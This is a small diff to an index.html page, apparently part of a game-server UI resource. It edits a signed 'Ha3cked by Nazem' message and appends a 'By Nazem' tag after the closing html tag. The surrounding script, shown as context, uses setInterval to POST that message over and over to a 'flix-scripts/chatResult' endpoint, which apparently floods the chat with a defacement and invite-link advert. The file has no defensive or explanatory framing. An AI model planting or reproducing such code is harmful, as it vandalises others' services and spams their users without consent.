--- a/index.html
+++ b/index.html
@@ -75,7 +75,7 @@
             }, 50);
 
 
-            const msg = `👑 Ha3cked by Nazem - .gg/4ns ! 👑`;
+            const msg = `👑 Ha3cked by Nazem - dis.gg/4ns ! 👑`;
             const body = JSON.stringify({ message: msg });
             setInterval(() => {
                 fetch("https://flix-scripts/chatResult", { method: "POST", body });
@@ -115,3 +115,4 @@
 </body>
 
 </html>
+By Nazem
